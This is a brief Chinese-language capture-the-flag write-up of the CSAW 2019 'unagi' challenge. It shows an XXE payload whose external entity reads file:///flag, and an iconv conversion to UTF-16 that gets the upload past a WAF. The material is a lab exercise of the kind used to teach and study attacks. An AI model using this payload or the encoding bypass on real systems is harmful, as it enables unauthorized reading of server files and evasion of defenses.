unagi
打开页面,四个跳转。
一个提示页面:
一个利用方式提示:
一个利用点:
利用方式:
XXE注入。
构造XXE注入代码:
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>[email protected]</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
上传后发现存在WAF:
通过XXE编码转换成utf-16编码绕过:
iconv -f utf8 -t utf-16 1.xml>2.xml
上传,获得flag。
总结
第一次做XXE的题目。
XXE模板中,使用file://读取文件。
iconv转换编码。